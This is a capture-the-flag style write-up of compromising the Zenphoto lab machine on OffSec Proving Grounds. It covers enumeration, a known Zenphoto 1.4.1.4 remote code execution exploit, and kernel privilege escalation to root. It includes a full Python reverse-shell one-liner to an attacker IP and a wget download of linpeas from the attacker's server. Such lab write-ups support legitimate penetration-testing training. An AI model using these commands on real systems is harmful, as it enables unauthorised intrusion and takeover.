Zenphoto

Writeup for Zenphoto from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.163.41 all

Service Enumeration

HTTP (Port 80)

gobuster dir -u http://192.168.163.41/ -w /usr/share/dirb/wordlists/common.txt -t 40

We see /test and /index which is of interest.

`/index`

Seems like it's just a blank page.

`/test`

/test looks more interesting and we can see that it is powered by Zenphoto.

Let's try to see if we can find the version number.

Looks like this is running Zenphoto 1.4.1.4.

A quick google search and we found out that Zenphoto 1.4.1.4 is vulnerable to 'ajax_create_folder.php' Remote Code Execution/

ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code ExecutionExploit Database

Exploit

Now that we have a shell, we can use python to get a more stable reverse shell.

Payload: export RHOST="192.168.49.163";export RPORT=443;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Privesc

Next, we can start a python SimpleHTTPServer to get LinPeas on the machine.

Attacking machine: python3 -m http.server 8000

Target machine: wget 192.168.49.163:8000/opt/PEASS-ng/linPEAS/linpeas

From linpeas, we see that there are kernel exploits for this version of the kernel.

We tried the first one, dirtycow 2, it didn't work well so we tried the second one, rds and it worked.

Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege EscalationExploit Database

We can use our Python SimpleHTTPServer to get rds onto the target machine.

And we get root after running rds.

PreviousZino NextSnookums

Last updated 2 years ago